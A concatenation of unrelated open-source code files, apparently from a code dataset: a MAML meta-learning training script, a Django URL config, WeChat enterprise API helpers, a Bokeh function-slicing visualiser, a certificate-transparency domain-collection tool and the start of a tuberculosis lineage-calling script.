batch_x, batch_y, amp, phase = data_generator.generate()
if FLAGS.baseline == 'oracle':
batch_x = np.concatenate([batch_x, np.zeros([batch_x.shape[0], batch_x.shape[1], 2])], 2)
for i in range(FLAGS.meta_batch_size):
batch_x[i, :, 1] = amp[i]
batch_x[i, :, 2] = phase[i]
inputa = batch_x[:, :num_classes*FLAGS.update_batch_size, :]
labela = batch_y[:, :num_classes*FLAGS.update_batch_size, :]
inputb = batch_x[:, num_classes*FLAGS.update_batch_size:, :] # b used for testing
labelb = batch_y[:, num_classes*FLAGS.update_batch_size:, :]
feed_dict = {model.inputa: inputa, model.inputb: inputb, model.labela: labela, model.labelb: labelb}
if itr < FLAGS.pretrain_iterations:
input_tensors = [model.pretrain_op]
else:
input_tensors = [model.metatrain_op]
if (itr % SUMMARY_INTERVAL == 0 or itr % PRINT_INTERVAL == 0):
input_tensors.extend([model.summ_op, model.total_loss1, model.total_losses2[FLAGS.num_updates-1]])
if model.classification:
input_tensors.extend([model.total_accuracy1, model.total_accuracies2[FLAGS.num_updates-1]])
result = sess.run(input_tensors, feed_dict)
if itr % SUMMARY_INTERVAL == 0:
prelosses.append(result[-2])
if FLAGS.log:
train_writer.add_summary(result[1], itr)
postlosses.append(result[-1])
if (itr!=0) and itr % PRINT_INTERVAL == 0:
if itr < FLAGS.pretrain_iterations:
print_str = 'Pretrain Iteration ' + str(itr)
else:
print_str = 'Iteration ' + str(itr - FLAGS.pretrain_iterations)
print_str += ': ' + str(np.mean(prelosses)) + ', ' + str(np.mean(postlosses))
print(print_str)
prelosses, postlosses = [], []
if (itr!=0) and itr % SAVE_INTERVAL == 0:
saver.save(sess, FLAGS.logdir + '/' + exp_string + '/model' + str(itr))
# sinusoid is infinite data, so no need to test on meta-validation set.
if (itr!=0) and itr % TEST_PRINT_INTERVAL == 0 and FLAGS.datasource !='sinusoid':
if 'generate' not in dir(data_generator):
feed_dict = {}
if model.classification:
input_tensors = [model.metaval_total_accuracy1, model.metaval_total_accuracies2[FLAGS.num_updates-1], model.summ_op]
else:
input_tensors = [model.metaval_total_loss1, model.metaval_total_losses2[FLAGS.num_updates-1], model.summ_op]
else:
batch_x, batch_y, amp, phase = data_generator.generate(train=False)
inputa = batch_x[:, :num_classes*FLAGS.update_batch_size, :]
inputb = batch_x[:, num_classes*FLAGS.update_batch_size:, :]
labela = batch_y[:, :num_classes*FLAGS.update_batch_size, :]
labelb = batch_y[:, num_classes*FLAGS.update_batch_size:, :]
feed_dict = {model.inputa: inputa, model.inputb: inputb, model.labela: labela, model.labelb: labelb, model.meta_lr: 0.0}
if model.classification:
input_tensors = [model.total_accuracy1, model.total_accuracies2[FLAGS.num_updates-1]]
else:
input_tensors = [model.total_loss1, model.total_losses2[FLAGS.num_updates-1]]
result = sess.run(input_tensors, feed_dict)
print('Validation results: ' + str(result[0]) + ', ' + str(result[1]))
saver.save(sess, FLAGS.logdir + '/' + exp_string + '/model' + str(itr))
# calculated for omniglot
NUM_TEST_POINTS = 600
def generate_test():
batch_size = 2
num_points = 101
# amp = np.array([3, 5])
# phase = np.array([0, 2.3])
amp = np.array([5, 3])
phase = np.array([2.3, 0])
outputs = np.zeros([batch_size, num_points, 1])
init_inputs = np.zeros([batch_size, num_points, 1])
for func in range(batch_size):
init_inputs[func, :, 0] = np.linspace(-5, 5, num_points)
outputs[func] = amp[func] * np.sin(init_inputs[func] - phase[func])
if FLAGS.baseline == 'oracle': # NOTE - this flag is specific to sinusoid
init_inputs = np.concatenate([init_inputs, np.zeros([init_inputs.shape[0], init_inputs.shape[1], 2])], 2)
for i in range(batch_size):
init_inputs[i, :, 1] = amp[i]
init_inputs[i, :, 2] = phase[i]
return init_inputs, outputs, amp, phase
def test_line_limit_Baye(model, sess, exp_string, mc_simulation=20, points_train=10, random_seed=1999):
inputs_all, outputs_all, amp_test, phase_test = generate_test()
np.random.seed(random_seed)
index = np.random.choice(inputs_all.shape[1], [inputs_all.shape[0], points_train], replace=False)
inputs_a = np.zeros([inputs_all.shape[0], points_train, inputs_all.shape[2]])
outputs_a = np.zeros([outputs_all.shape[0], points_train, outputs_all.shape[2]])
for line in range(len(index)):
inputs_a[line] = inputs_all[line, index[line], :]
outputs_a[line] = outputs_all[line, index[line], :]
feed_dict_line = {model.inputa: inputs_a, model.inputb: inputs_all, model.labela: outputs_a, model.labelb: outputs_all, model.meta_lr: 0.0}
mc_prediction = []
for mc_iter in range(mc_simulation):
predictions_all = sess.run(model.outputbs, feed_dict_line)
mc_prediction.append(np.array(predictions_all))
print("total mc simulation: ", mc_simulation)
print("shape of predictions_all is: ", predictions_all[0].shape)
prob_mean = np.nanmean(mc_prediction, axis=0)
prob_variance = np.var(mc_prediction, axis=0)
for line in range(len(inputs_all)):
plt.figure()
plt.plot(inputs_all[line, ..., 0].squeeze(), outputs_all[line, ..., 0].squeeze(), "r-", label="ground_truth")
# for update_step in range(len(predictions_all)):
for update_step in [0, len(predictions_all)-1]:
X = inputs_all[line, ..., 0].squeeze()
mu = prob_mean[update_step][line, ...].squeeze()
uncertainty = np.sqrt(prob_variance[update_step][line, ...].squeeze())
plt.plot(X, mu, "--", label="update_step_{:d}".format(update_step))
plt.fill_between(X, mu + uncertainty, mu - uncertainty, alpha=0.1)
plt.legend()
out_figure = FLAGS.logdir + '/' + exp_string + '/' + 'test_ubs' + str(
FLAGS.update_batch_size) + '_stepsize' + str(FLAGS.update_lr) + 'line_{0:d}_numtrain_{1:d}_seed_{2:d}.png'.format(line, points_train, random_seed)
plt.plot(inputs_a[line, :, 0], outputs_a[line, :, 0], "b*", label="training points")
plt.savefig(out_figure, bbox_inches="tight", dpi=300)
plt.close()
def test_line_limit(model, sess, exp_string, num_train=10, random_seed=1999):
inputs_all, outputs_all, amp_test, phase_test = generate_test()
np.random.seed(random_seed)
index = np.random.choice(inputs_all.shape[1], [inputs_all.shape[0], num_train], replace=False)
inputs_a = np.zeros([inputs_all.shape[0], num_train, inputs_all.shape[2]])
outputs_a = np.zeros([outputs_all.shape[0], num_train, outputs_all.shape[2]])
for line in range(len(index)):
inputs_a[line] = inputs_all[line, index[line], :]
outputs_a[line] = outputs_all[line, index[line], :]
feed_dict_line = {model.inputa: inputs_a, model.inputb: inputs_all, model.labela: outputs_a, model.labelb: outputs_all, model.meta_lr: 0.0}
predictions_all = sess.run([model.outputas, model.outputbs], feed_dict_line)
print("shape of predictions_all is: ", predictions_all[0].shape)
for line in range(len(inputs_all)):
plt.figure()
plt.plot(inputs_all[line, ..., 0].squeeze(), outputs_all[line, ..., 0].squeeze(), "r-", label="ground_truth")
for update_step in range(len(predictions_all[1])):
plt.plot(inputs_all[line, ..., 0].squeeze(), predictions_all[1][update_step][line, ...].squeeze(), "--", label="update_step_{:d}".format(update_step))
plt.legend()
out_figure = FLAGS.logdir + '/' + exp_string + '/' + 'test_ubs' + str(
FLAGS.update_batch_size) + '_stepsize' + str(FLAGS.update_lr) + 'line_{0:d}_numtrain_{1:d}_seed_{2:d}.png'.format(line, num_train, random_seed)
plt.plot(inputs_a[line, :, 0], outputs_a[line, :, 0], "b*", label="training points")
plt.savefig(out_figure, bbox_inches="tight", dpi=300)
plt.close()
def test_line(model, sess, exp_string):
inputs_all, outputs_all, amp_test, phase_test = generate_test()
feed_dict_line = {model.inputa: inputs_all, model.inputb: inputs_all, model.labela: outputs_all, model.labelb: outputs_all, model.meta_lr: 0.0}
predictions_all = sess.run([model.outputas, model.outputbs], feed_dict_line)
print("shape of predictions_all is: ", predictions_all[0].shape)
for line in range(len(inputs_all)):
plt.figure()
plt.plot(inputs_all[line, ..., 0].squeeze(), outputs_all[line, ..., 0].squeeze(), "r-", label="ground_truth")
for update_step in range(len(predictions_all[1])):
plt.plot(inputs_all[line, ..., 0].squeeze(), predictions_all[1][update_step][line, ...].squeeze(), "--", label="update_step_{:d}".format(update_step))
plt.legend()
out_figure = FLAGS.logdir + '/' + exp_string + '/' + 'test_ubs' + str(
FLAGS.update_batch_size) + '_stepsize' + str(FLAGS.update_lr) + 'line_{0:d}.png'.format(line)
plt.savefig(out_figure, bbox_inches="tight", dpi=300)
plt.close()
# for line in range(len(inputs_all)):
# plt.figure()
# plt.plot(inputs_all[line, ..., 0].squeeze(), outputs_all[line, ..., 0].squeeze(), "r-", label="ground_truth")
#
# plt.plot(inputs_all[line, ..., 0].squeeze(), predictions_all[0][line, ...].squeeze(), "--",
# label="initial")
# plt.legend()
#
# out_figure = FLAGS.logdir + '/' + exp_string + '/' + 'test_ubs' + str(
# FLAGS.update_batch_size) + '_stepsize' + str(FLAGS.update_lr) + 'init_line_{0:d}.png'.format(line)
#
# plt.savefig(out_figure, bbox_inches="tight", dpi=300)
# plt.close()
def test(model, saver, sess, exp_string, data_generator, test_num_updates=None):
num_classes = data_generator.num_classes # for classification, 1 otherwise
np.random.seed(1)
random.seed(1)
metaval_accuracies = []
for _ in range(NUM_TEST_POINTS):
if 'generate' not in dir(data_generator):
feed_dict = {}
feed_dict = {model.meta_lr : 0.0}
else:
batch_x, batch_y, amp, phase = data_generator.generate(train=False)
if FLAGS.baseline == 'oracle': # NOTE - this flag is specific to sinusoid
batch_x = np.concatenate([batch_x, np.zeros([batch_x.shape[0], batch_x.shape[1], 2])], 2)
batch_x[0, :, 1] = amp[0]
batch_x[0, :, 2] = phase[0]
inputa = batch_x[:, :num_classes*FLAGS.update_batch_size, :]
inputb = batch_x[:,num_classes*FLAGS.update_batch_size:, :]
labela = batch_y[:, :num_classes*FLAGS.update_batch_size, :]
labelb = batch_y[:,num_classes*FLAGS.update_batch_size:, :]
feed_dict = {model.inputa: inputa, model.inputb: inputb, model.labela: labela, model.labelb: labelb, model.meta_lr: 0.0}
if model.classification:
result = sess.run([model.metaval_total_accuracy1] + model.metaval_total_accuracies2, feed_dict)
else: # this is for sinusoid
result = sess.run([model.total_loss1] + model.total_losses2, feed_dict)
metaval_accuracies.append(result)
metaval_accuracies = np.array(metaval_accuracies)
means = np.mean(metaval_accuracies, 0)
stds = np.std(metaval_accuracies, 0)
ci95 = 1.96*stds/np.sqrt(NUM_TEST_POINTS)
print('Mean validation accuracy/loss, stddev, and confidence intervals')
print((means, stds, ci95))
out_filename = FLAGS.logdir +'/'+ exp_string + '/' + 'test_ubs' + str(FLAGS.update_batch_size) + '_stepsize' + str(FLAGS.update_lr) + '.csv'
out_pkl = FLAGS.logdir +'/'+ exp_string + '/' + 'test_ubs' + str(FLAGS.update_batch_size) + '_stepsize' + str(FLAGS.update_lr) + '.pkl'
with open(out_pkl, 'wb') as f:
pickle.dump({'mses': metaval_accuracies}, f)
with open(out_filename, 'w') as f:
writer = csv.writer(f, delimiter=',')
writer.writerow(['update'+str(i) for i in range(len(means))])
writer.writerow(means)
writer.writerow(stds)
writer.writerow(ci95)
def main():
if FLAGS.datasource == 'sinusoid':
if FLAGS.train:
test_num_updates = 5
else:
test_num_updates = 10
else:
if FLAGS.datasource == 'miniimagenet':
if FLAGS.train == True:
test_num_updates = 1 # eval on at least one update during training
else:
test_num_updates = 10
else:
test_num_updates = 10
if FLAGS.train == False:
orig_meta_batch_size = FLAGS.meta_batch_size
# always use meta batch size of 1 when testing.
FLAGS.meta_batch_size = 1
if FLAGS.datasource == 'sinusoid':
data_generator = DataGenerator(FLAGS.update_batch_size*2, FLAGS.meta_batch_size)
else:
if FLAGS.metatrain_iterations == 0 and FLAGS.datasource == 'miniimagenet':
assert FLAGS.meta_batch_size == 1
assert FLAGS.update_batch_size == 1
data_generator = DataGenerator(1, FLAGS.meta_batch_size) # only use one datapoint,
else:
if FLAGS.datasource == 'miniimagenet': # TODO - use 15 val examples for imagenet?
if FLAGS.train:
data_generator = DataGenerator(FLAGS.update_batch_size+15, FLAGS.meta_batch_size) # only use one datapoint for testing to save memory
else:
data_generator = DataGenerator(FLAGS.update_batch_size*2, FLAGS.meta_batch_size) # only use one datapoint for testing to save memory
else:
data_generator = DataGenerator(FLAGS.update_batch_size*2, FLAGS.meta_batch_size) # only use one datapoint for testing to save memory
dim_output = data_generator.dim_output
if FLAGS.baseline == 'oracle':
assert FLAGS.datasource == 'sinusoid'
dim_input = 3
FLAGS.pretrain_iterations += FLAGS.metatrain_iterations
FLAGS.metatrain_iterations = 0
else:
dim_input = data_generator.dim_input
if FLAGS.datasource == 'miniimagenet' or FLAGS.datasource == 'omniglot':
tf_data_load = True
num_classes = data_generator.num_classes
if FLAGS.train: # only construct training model if needed
random.seed(5)
image_tensor, label_tensor = data_generator.make_data_tensor()
inputa = tf.slice(image_tensor, [0,0,0], [-1,num_classes*FLAGS.update_batch_size, -1])
inputb = tf.slice(image_tensor, [0,num_classes*FLAGS.update_batch_size, 0], [-1,-1,-1])
labela = tf.slice(label_tensor, [0,0,0], [-1,num_classes*FLAGS.update_batch_size, -1])
labelb = tf.slice(label_tensor, [0,num_classes*FLAGS.update_batch_size, 0], [-1,-1,-1])
input_tensors = {'inputa': inputa, 'inputb': inputb, 'labela': labela, 'labelb': labelb}
random.seed(6)
image_tensor, label_tensor = data_generator.make_data_tensor(train=False)
inputa = tf.slice(image_tensor, [0,0,0], [-1,num_classes*FLAGS.update_batch_size, -1])
inputb = tf.slice(image_tensor, [0,num_classes*FLAGS.update_batch_size, 0], [-1,-1,-1])
labela = tf.slice(label_tensor, [0,0,0], [-1,num_classes*FLAGS.update_batch_size, -1])
labelb = tf.slice(label_tensor, [0,num_classes*FLAGS.update_batch_size, 0], [-1,-1,-1])
metaval_input_tensors = {'inputa': inputa, 'inputb': inputb, 'labela': labela, 'labelb': labelb}
else:
tf_data_load = False
input_tensors = None
model = MAML(dim_input, dim_output, test_num_updates=test_num_updates)
if FLAGS.train or not tf_data_load:
model.construct_model(input_tensors=input_tensors, prefix='metatrain_')
if tf_data_load:
model.construct_model(input_tensors=metaval_input_tensors, prefix='metaval_')
model.summ_op = tf.summary.merge_all()
saver = loader = tf.train.Saver(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES), max_to_keep=10)
sess = tf.InteractiveSession()
if FLAGS.train == False:
# change to original meta batch size when loading model.
FLAGS.meta_batch_size = orig_meta_batch_size
if FLAGS.train_update_batch_size == -1:
FLAGS.train_update_batch_size = FLAGS.update_batch_size
if FLAGS.train_update_lr == -1:
FLAGS.train_update_lr = FLAGS.update_lr
exp_string = 'cls_'+str(FLAGS.num_classes)+'.mbs_'+str(FLAGS.meta_batch_size) + '.ubs_' + str(FLAGS.train_update_batch_size) + '.numstep' + str(FLAGS.num_updates) + '.updatelr' + str(FLAGS.train_update_lr)
if FLAGS.num_filters != 64:
exp_string += 'hidden' + str(FLAGS.num_filters)
if FLAGS.max_pool:
exp_string += 'maxpool'
if FLAGS.stop_grad:
exp_string += 'stopgrad'
if FLAGS.baseline:
exp_string += FLAGS.baseline
if FLAGS.norm == 'batch_norm':
exp_string += 'batchnorm'
elif FLAGS.norm == 'layer_norm':
exp_string += 'layernorm'
elif FLAGS.norm == 'None':
exp_string += 'nonorm'
else:
print('Norm setting not recognized.')
if FLAGS.pretrain_iterations != 0:
exp_string += '.pt' + str(FLAGS.pretrain_iterations)
if FLAGS.metatrain_iterations != 0:
exp_string += '.mt' + str(FLAGS.metatrain_iterations)
if FLAGS.keep_prob is not None:
exp_string += "kp{:.2f}".format(FLAGS.keep_prob)
if FLAGS.drop_connect is True:
exp_string += ".dropconn"
resume_itr = 0
model_file = None
tf.global_variables_initializer().run()
tf.train.start_queue_runners()
if FLAGS.resume or not FLAGS.train:
if exp_string == 'cls_5.mbs_25.ubs_10.numstep1.updatelr0.001nonorm.mt70000':
model_file = 'logs/sine//cls_5.mbs_25.ubs_10.numstep1.updatelr0.001nonorm.mt70000/model69999'
else:
model_file = tf.train.latest_checkpoint(FLAGS.logdir + '/' + exp_string)
# model_file = 'logs/sine//cls_5.mbs_25.ubs_10.numstep1.updatelr0.001nonorm.mt70000/model69999'
if FLAGS.test_iter > 0:
model_file = model_file[:model_file.index('model')] + 'model' + str(FLAGS.test_iter)
if model_file:
ind1 = model_file.index('model')
resume_itr = int(model_file[ind1+5:])
print("Restoring model weights from " + model_file)
saver.restore(sess, model_file)
if FLAGS.train:
train(model, saver, sess, exp_string, data_generator, resume_itr)
else:
# test_line(model, sess, exp_string)
# test_line_limit(model, sess, exp_string, num_train=2, random_seed=1999)
test_line_limit_Baye(model, sess, exp_string, mc_simulation=20, points_train=10, random_seed=1999)
# test(model, saver, sess, exp_string, data_generator, test_num_updates)
if __name__ == "__main__":
main()
# import matplotlib.pyplot as plt
# plt.plot(inputa.squeeze(), labela.squeeze(), "*")
# re = sess.run(model.result, feed_dict)
# plt.plot(inputa.squeeze(), re[0].squeeze(), "*")
# plt.savefig("/home/cougarnet.uh.edu/pyuan2/Projects2019/maml/Figures/maml/preda.png", bbox_inches="tight", dpi=300)
# for i in range(len(re[1])):
# plt.figure()
# plt.plot(inputb.squeeze(), labelb.squeeze(), "*")
# plt.plot(inputb.squeeze(), re[1][i].squeeze(), "*")
# plt.savefig("/home/cougarnet.uh.edu/pyuan2/Projects2019/maml/Figures/maml/predb_{:d}.png".format(i), bbox_inches="tight", dpi=300)
# plt.close()
# plt.figure()
# plt.imshow(metaval_accuracies)
# plt.savefig("/home/cougarnet.uh.edu/pyuan2/Projects2019/maml/Figures/maml/losses.png", bbox_inches="tight", dpi=300)
## Generate all sine
# def generate_test():
# amp_range = [0.1, 5.0]
# phase_range = [0, np.pi]
# batch_size = 100
# num_points = 101
# # amp = np.array([3, 5])
# # phase = np.array([0, 2.3])
# amp = np.random.uniform(amp_range[0], amp_range[1], [batch_size])
# phase = np.random.uniform(phase_range[0], phase_range[1], [batch_size])
# outputs = np.zeros([batch_size, num_points, 1])
# init_inputs = np.zeros([batch_size, num_points, 1])
# for func in range(batch_size):
# init_inputs[func, :, 0] = np.linspace(-5, 5, num_points)
# outputs[func] = amp[func] * np.sin(init_inputs[func] - phase[func])
# return init_inputs, outputs, amp, phase
# init_inputs, outputs, amp, phase = generate_test()
# plt.figure()
# for i in range(len(init_inputs)):
# plt.plot(init_inputs[i].squeeze(), outputs[i].squeeze())
|
StarcoderdataPython
|
102334
|
from __future__ import unicode_literals
from django.conf.urls.defaults import patterns, include, url
from django.conf import settings
urlpatterns = patterns('',
url(r'^$', 'xue.bandexams.views.my_view'),
url(r'add/$', 'xue.bandexams.views.add_view'),
)
# vim:ai:et:ts=4:sw=4:sts=4:fenc=utf8:
|
StarcoderdataPython
|
1706849
|
<gh_stars>1000+
try:
from urllib import quote_plus as quote
except ImportError:
from urllib.parse import quote_plus as quote
import time
from itchatmp.config import COMPANY_URL
from itchatmp.returnvalues import ReturnValue
from itchatmp.utils import retry, encode_send_dict
from ..requests import requests
from .common import access_token
# __server
def generate_code_url(redirectUri, state=None):
''' generate redirect url for visiting with code
* you don't need to urlencode redirectUri
'''
return ('https://open.weixin.qq.com/connect/oauth2/authorize?' +
'appid=%s&redirect_uri=%s&response_type=code&scope=snsapi_base' +
'&state=%s#wechat_redirect') % \
('__server.config.copId', quote(redirectUri), quote((state or str(int(time.time())))))
@access_token
def get_user_info(code, accessToken=None):
params = {
'access_token': accessToken,
'code': code, }
r = requests.get('%s/cgi-bin/user/getuserinfo' % COMPANY_URL,
params=params).json()
if 'DeviceId' in r: r['errcode'] = 0
return ReturnValue(r)
@access_token
def user_id_open_id_switch(userId=None, openId=None, agentId=None, accessToken=None):
data = {}
if userId:
data['userid'] = userId
if agentId: data['agentid'] = agentId
url = '%s/cgi-bin/user/convert_to_openid?access_token=' + accessToken
elif openId:
data['openid'] = openId
url = '%s/cgi-bin/user/convert_to_userid?access_token=' + accessToken
data = encode_send_dict(data)
if data is None: return ReturnValue({'errcode': -10001})
r = requests.post(url % COMPANY_URL, data=data).json()
return ReturnValue(r)
@access_token
def get_login_info(code, accessToken=None):
data = {'auth_code': code, }
r = requests.post('%s/cgi-bin/service/get_login_info?access_token=%s' %
(COMPANY_URL, accessToken), data=data).json()
if 'usertype' in r: r['errcode'] = 0
return ReturnValue(r)
|
StarcoderdataPython
|
4811532
|
from bokeh.io import output_file
from bokeh.layouts import column, row
from bokeh.models import HoverTool
from bokeh.models.callbacks import CustomJS
from bokeh.models.widgets import Select
from bokeh.plotting import figure, ColumnDataSource, save
import json
import numpy as np
import sobol_seq
class Slice1D:
def __init__(self, plot, dim, x_grid, n_fpoint):
self.__plot = plot
self.x_grid = x_grid
self.dim = dim
self.size = n_fpoint
def data(self, i):
if i > self.size-1:
raise Exception('Trying to get non-exist data. Axis number should not exceed {}'.format(self.size - 1))
elif i < 0:
raise Exception('Cannot achieve plot data at negative index')
return self.__plot[i]
def to_json(self):
json_dict = {
'x_grid': self.x_grid.tolist(),
'size': self.size,
'dim': self.dim,
'entries': self.__plot
}
return json.dumps(json_dict)
def generate_sample_point(mn, mx, dim, n_fpoint, method='sobol'):
# in order to provide possibility of having other method in the future
if method == 'sobol':
sobol_points = sobol_seq.i4_sobol_generate(dim, n_fpoint)
return np.interp(sobol_points, [0, 1], [mn, mx])
else:
pass
# sliceplorer(function_spec, n_focus_point), which has function_spec spreading to
# f: function defined from outer program
# mn, mx: min and max range of computation
# dim: number of dimension of the function, f
# sampling method now only supports sobol sequences
def sliceplorer_core(f, mn, mx, dim: int, n_fpoint: int, n_seg: int=100, method='sobol'):
if mx <= mn:
raise Exception('Input min exceeds max value. (Error: min >= max)')
if n_fpoint <= 0:
raise Exception('Program requires at least 1 focus point.')
if dim < 1:
raise Exception('Sliceplorer does not support less than 1 dimension. (Error: dim < 1)')
if n_seg <= 0:
raise Exception('Number of linear space must be positive integer.')
sample_points = generate_sample_point(mn, mx, dim, n_fpoint, method=method)
f_vec = np.vectorize(f)
x = np.linspace(mn, mx, n_seg)
result = []
for point in sample_points:
data = []
for i in range(0, dim):
# create an argument list from point while having the i-th argument replaced
# with the array x, the array acts as free variable of our 1D slice
parg = []
parg += point[0:i].tolist()
parg.append(x)
parg += point[i + 1:].tolist()
v = f_vec(*parg)
data.append(v.tolist())
result.append({
'point': point.tolist(),
'data': data
})
return Slice1D(result, dim, x, n_fpoint)
def sliceplorer(f, mn, mx, dim, n_fpoint, output=None, n_seg=100, method='sobol', width=-1, height=-1, title=None):
calc_data = sliceplorer_core(f, mn, mx, dim, n_fpoint, n_seg, method)
source = []
for i in range(0, calc_data.size):
data = {
'x': calc_data.x_grid,
'fp': [calc_data.data(i)['point']] * len(calc_data.x_grid)
}
for j in range(0, calc_data.dim):
var_name = 'y' + str(j)
data[var_name] = calc_data.data(i)['data'][j]
source.append(ColumnDataSource(data=data))
tooltips = [
("(x,y)", "($x, $y)"),
("focus point", "@fp")
]
hover = HoverTool(tooltips=tooltips)
trace = [None] * calc_data.dim
for j in range(0, calc_data.size):
for i in range(0, calc_data.dim):
if not trace[i]:
if i == 0:
trace[i] = figure(
tools="wheel_zoom, pan",
title="x" + str(i + 1),
x_range=(mn, mx),
)
else:
trace[i] = figure(
tools="wheel_zoom, pan",
title="x" + str(i + 1),
x_range=trace[0].x_range,
y_range=trace[0].y_range
)
trace[i].add_tools(hover)
trace[i].line(
'x',
'y' + str(i),
source=source[j],
color="black",
alpha=0.1,
hover_color="firebrick",
hover_alpha=1,
name=str(i) + str(j)
)
data = {
'x': [],
'fp': []
}
for i in range(0, calc_data.dim):
var_name = 'y' + str(i)
data[var_name] = []
reset_source = ColumnDataSource(data=data)
hidden_source = ColumnDataSource(data=data)
for i in range(0, calc_data.dim):
trace[i].line(
'x',
'y' + str(i),
source=hidden_source,
color='firebrick',
alpha=1,
line_width=2
)
callback = CustomJS(args=dict(src=source, hsrc=hidden_source, resrc=reset_source), code="""
var sel_index = parseInt(cb_obj.value);
var data;
if (sel_index < 0)
data = resrc.data;
else
data = src[sel_index].data;
hsrc.data = data
""")
menu = [("-1", 'None')]
for i in range(0, calc_data.size):
menu.append((str(i), str(calc_data.data(i)['point'])))
select = Select(title="Select Focus Point:", value="-1", options=menu)
select.js_on_change('value', callback)
if width > 0:
for t in trace:
t.plot_width = width
if height > 0:
for t in trace:
t.plot_height = height
col = column(trace)
if output:
output_file(output)
save(row(col, select), title=title if title else 'Sliceplorer')
|
StarcoderdataPython
|
3206330
|
DEFAULT_PORT = "0.0.0.0:6789"
|
StarcoderdataPython
|
115327
|
from app import logger, engine, parser
from app.utilities import export_db_to_excel, create_dataframe_from_sql, resolve_domains, export_to_excel, \
check_valid_domain_name
from app.get_certs import get_cert_ids_by_org, parse_domains_and_update_certsmasterdb, get_cert_by_domain_name
from app.filter import filter_domains
import sys
from app.globalvars import filename_prepend, input_file, input_phrase, input_domain_flag, input_org_flag, \
export_all_outfile, export_outfile, process, search_tag, internal_tld_file, external_tld_file, output_type
# if the task is to process domains stored in the sqlite database
if process is not None:
logger.debug('Created dataframe from the database\n')
dataframe = create_dataframe_from_sql(engine=engine, tablename='certsmaster')
if search_tag is not None:
logger.info('Detected tag :"{}"'.format(search_tag))
selected_dataframe = dataframe[dataframe['search_tag'].str.contains(r'\b{}\b'.format(search_tag))]
# once dataframe is selected with rows containing tag, send it as input to filter_domain to do filtering and
# get only external TLDs
if selected_dataframe.empty:
logger.warning('No records with the given search tag!!')
sys.exit('Exiting!')
else:
logger.info('Processing only selected data from backend database, based on "{}" tag\n'.format(search_tag))
logger.debug('Passing dataframe to filter_domains\n')
external_tld_df = filter_domains(internal_tld_file=internal_tld_file, external_tld_file=external_tld_file,
dataframe=selected_dataframe)
else: # original dataframe containing all rows goes for processing
# once dataframe is created from Sqlite database, send it as input to filter_domain to do filtering and get only
# external TLDs
logger.info('Processing all data from backend database\n')
logger.debug('Passing dataframe to filter_domains\n')
external_tld_df = filter_domains(internal_tld_file=internal_tld_file, external_tld_file=external_tld_file,
dataframe=dataframe)
logger.info('Proceeding to resolve IP address/ CNAME for external domain\n')
# Resolve the IP address and CNAME for each external domain filtered INPUT: External TLD dataframe
ns_dataframe = resolve_domains(external_tld_df)
logger.info('Exporting the DNS results to an excel {} - {}\n'.format(filename_prepend, 'NS_Results'))
export_to_excel(ns_dataframe, '{} - NS_Results'.format(filename_prepend))
# if the task is to update sqlite database with domain list or individual domain or export the contents of database
else: # The request is not to process but update databases from CRT.SH i.e. process arg not given
if input_domain_flag is not False:
# sys.exit('Not recommended, will be phased out soon! Sorry! \nExiting!!')
if input_file is not None:
logger.debug('Input file detected')
with open(input_file, 'r') as file:
logger.debug('Opened input file {}'.format(input_file))
i = 1
for item in file.readlines():
domain = item.rstrip()
logger.info('\n************************************************************\n'
'Processing client number {} : {}\n'
'************************************************************\n'.format(i, domain))
if check_valid_domain_name(domain):
get_cert_by_domain_name(domain=domain)
i += 1
if input_phrase is not None:
logger.debug('Input domain detected')
domain = input_phrase.rstrip()
logger.info('Processing {}\n'.format(domain))
if check_valid_domain_name(domain):
get_cert_by_domain_name(domain=domain)
if export_all_outfile is not False:
logger.debug('Export all option detected. Proceeding to export entire database into excel')
export_db_to_excel(engine=engine, tablename='certsmaster', outfile=export_all_outfile,
search_tag=search_tag)
if input_org_flag is not False:
if input_file is not None:
logger.debug('Input file detected')
with open(input_file, 'r') as file:
logger.debug('Opened input file {}'.format(input_file))
i = 1
for item in file.readlines():
org_name = item.rstrip()
logger.info('\n\n************************************************************\n'
'Processing client number {} : {}\n'
'************************************************************\n'.format(i, org_name))
certs_ref_df = get_cert_ids_by_org(org_name=org_name)
parse_domains_and_update_certsmasterdb(certs_ref_df=certs_ref_df, org_name=org_name)
i += 1
if input_phrase is not None:
logger.debug('Input domain detected')
org_name = input_phrase.rstrip()
logger.info('Processing {}\n'.format(org_name))
certs_ref_df = get_cert_ids_by_org(org_name=org_name) # Returns a dataframe of output
parse_domains_and_update_certsmasterdb(certs_ref_df=certs_ref_df, org_name=org_name)
if export_all_outfile is not False:
logger.debug(
'Export all option detected. Proceeding to export entire certsmaster table in database into excel')
export_db_to_excel(engine=engine, tablename='certsmaster', outfile=export_all_outfile,
search_tag=search_tag)
# i.e. if only -eA is given as option
if export_all_outfile is not False:
logger.debug('Export all option detected. Proceeding to export entire certsmaster table in database into excel')
export_db_to_excel(engine=engine, tablename='certsmaster', outfile=export_all_outfile)
# Print help if all arguments are none
if input_file is None and export_all_outfile is False and input_phrase is None:
logger.info('No arguments given. Printing default help\n')
parser.print_help() # Prints help if not argument is given to arg parse
logger.info('Cert Stash has finished processing...')
logger.info('Done!\n')
|
StarcoderdataPython
|
16374
|
<gh_stars>0
#! /usr/bin/python
import sys
""" This script accepts the final annotation file and the lineage marker SNPs file """
""" and infers the lineage and possible sublineage classification of the isolate """
""" it requires a sample ID name (string) and an output file name(string) """
"""
Author: <NAME>
CPTR ReSeqTB Project - Critical Path Institute
"""
input1 = sys.argv[1]
input2 = sys.argv[2]
input3 = sys.argv[3]
input4 = sys.argv[4]
fh1 = open(input1, 'r')
sublinn = ""
(lineage,position,ref,alt) = ([],[],[],[])
prevlin = []
prevsub = []
tribes = ["lineages","Indo-Oceanic","East-Asian","East-African-Indian","Euro-American","West-Africa 1","West-Africa 2","Ethiopian"]
(concord,discord,concord1,discord1,count) = (0,0,0,0,0)
discordance = False
sublinneage = False
linfour = ""
hrv37 = ""
BOV = ""
BOV_AFRI = ""
for lines in fh1:
if lines.startswith('#'):
continue
fields = lines.rstrip("\r\n").split("\t")
lineage.append(fields[0])
position.append(fields[1])
ref.append(fields[2])
alt.append(fields[3])
fh1.close()
fh2 = open(input2,'r')
for lines in fh2:
count += 1
fields = lines.rstrip("\r\n").split("\t")
if fields[2] == '931123':
linfour = fields[2]
if fields[2] == '1759252':
hrv37 = fields[2]
if fields[2] == '2831482':
BOV = fields[2]
if fields[2] == '1882180':
BOV_AFRI = '1882180'
if fields[2] in position:
ind = position.index(fields[2])
if alt[ind] == fields[4]:
if len(lineage[ind]) > 1:
